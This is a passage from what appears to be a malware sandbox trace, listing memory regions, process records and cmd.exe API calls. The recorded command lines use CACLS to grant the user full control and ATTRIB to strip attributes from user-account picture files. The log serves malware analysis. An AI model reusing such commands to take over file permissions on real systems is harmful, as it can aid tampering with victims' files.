(normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25974 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 25975 start_va = 0x4c0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 25976 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25977 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25978 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25979 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25980 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25981 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25982 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 511 os_tid = 0xfe0 Thread: id = 512 os_tid = 0xe48 Process: id = "357" image_name = 
"attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xfec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "355" os_parent_pid = "0xe58" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25983 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25984 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25985 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25986 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 25987 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0xa0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25988 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25989 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" 
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25990 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25991 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 25992 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25993 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25994 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25995 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25996 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 25997 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 25998 start_va = 0x6dea0000 end_va = 0x6debcfff entry_point = 0x6dea0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25999 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26000 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = 
"\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 26001 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26002 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26003 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 26004 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26005 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26006 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26007 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 26008 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26009 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26010 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 26011 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26012 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 513 os_tid = 0xf58 Process: id = "358" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xe50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26013 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26014 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = 
"" Region: id = 26015 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 26016 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 26017 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 26018 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26019 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 26020 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 26021 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 26022 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 26023 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 26024 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 26025 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 26026 
start_va = 0x190000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 26027 start_va = 0x420000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 26028 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 26029 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 26030 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 26031 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 26032 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 26033 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 26034 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 26035 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = 
"gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 26036 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 26037 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 26038 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 26039 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 26040 start_va = 0x1a0000 end_va = 0x1a6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 26041 start_va = 0x2b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 26042 start_va = 0x3c0000 end_va = 0x3c1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003c0000" filename = "" Region: id = 26043 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 26044 start_va = 0x3e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 26045 start_va = 0x520000 end_va = 0x111ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 26046 start_va = 0x1120000 end_va = 0x1282fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001120000" filename = "" Region: id = 26047 start_va = 0x1290000 end_va = 
0x155efff entry_point = 0x1290000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 514 os_tid = 0xddc [0183.690] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af7ec | out: lpSystemTimeAsFileTime=0x2af7ec*(dwLowDateTime=0xa2644d00, dwHighDateTime=0x1d440a9)) [0183.690] GetCurrentProcessId () returned 0xe50 [0183.691] GetCurrentThreadId () returned 0xddc [0183.691] GetTickCount () returned 0x3497d [0183.691] QueryPerformanceCounter (in: lpPerformanceCount=0x2af7e4 | out: lpPerformanceCount=0x2af7e4*=24047978880) returned 1 [0183.691] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0183.691] __set_app_type (_Type=0x1) [0183.691] __p__fmode () returned 0x76b331f4 [0183.691] __p__commode () returned 0x76b331fc [0183.691] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0183.691] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0183.692] GetCurrentThreadId () returned 0xddc [0183.692] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xddc) returned 0x38 [0183.692] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0183.692] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0183.692] SetThreadUILanguage (LangId=0x0) returned 0x409 [0183.692] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0183.692] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af77c | out: phkResult=0x2af77c*=0x0) returned 0x2 [0183.692] VirtualQuery (in: lpAddress=0x2af7b3, lpBuffer=0x2af74c, dwLength=0x1c | out: 
lpBuffer=0x2af74c*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0183.692] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af74c, dwLength=0x1c | out: lpBuffer=0x2af74c*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0183.692] GetConsoleOutputCP () returned 0x1b5 [0183.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0183.692] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0183.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.692] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0183.693] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.693] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0183.693] _get_osfhandle (_FileHandle=1) returned 0x7 [0183.693] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0183.693] _get_osfhandle (_FileHandle=0) returned 0x3 [0183.693] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0183.693] 
_get_osfhandle (_FileHandle=0) returned 0x3 [0183.693] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0183.693] GetEnvironmentStringsW () returned 0x430308* [0183.693] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.694] GetEnvironmentStringsW () returned 0x430308* [0183.694] FreeEnvironmentStringsW (penv=0x430308) returned 1 [0183.694] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae6ec | out: phkResult=0x2ae6ec*=0x40) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0xb8, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x0, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x4) returned 0x0 
[0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegCloseKey (hKey=0x40) returned 0x0 [0183.694] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae6ec | out: phkResult=0x2ae6ec*=0x40) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x40, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x1, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.694] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x0, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.695] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x9, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.695] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x4, lpData=0x2ae6f8*=0x9, lpcbData=0x2ae6f0*=0x4) returned 0x0 [0183.695] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 
lpReserved=0x0, lpType=0x2ae6f4, lpData=0x2ae6f8, lpcbData=0x2ae6f0*=0x1000 | out: lpType=0x2ae6f4*=0x0, lpData=0x2ae6f8*=0x9, lpcbData=0x2ae6f0*=0x1000) returned 0x2 [0183.695] RegCloseKey (hKey=0x40) returned 0x0 [0183.695] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886391 [0183.695] srand (_Seed=0x5b886391) [0183.695] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" [0183.695] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile20.bmp\"" [0183.695] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0183.695] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x431a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0183.696] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0183.696] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0183.696] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.696] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0183.696] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0183.696] _wcsicmp (_String1="PROMPT", 
_String2="CMDEXTVERSION") returned 13 [0183.696] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0183.696] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0183.696] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0183.696] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0183.696] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0183.696] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0183.696] GetEnvironmentStringsW () returned 0x432458* [0183.696] FreeEnvironmentStringsW (penv=0x432458) returned 1 [0183.696] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0183.696] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0183.696] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0183.696] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0183.696] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0183.696] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0183.696] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0183.696] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0183.696] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0183.697] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0183.697] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af4b8 | out: 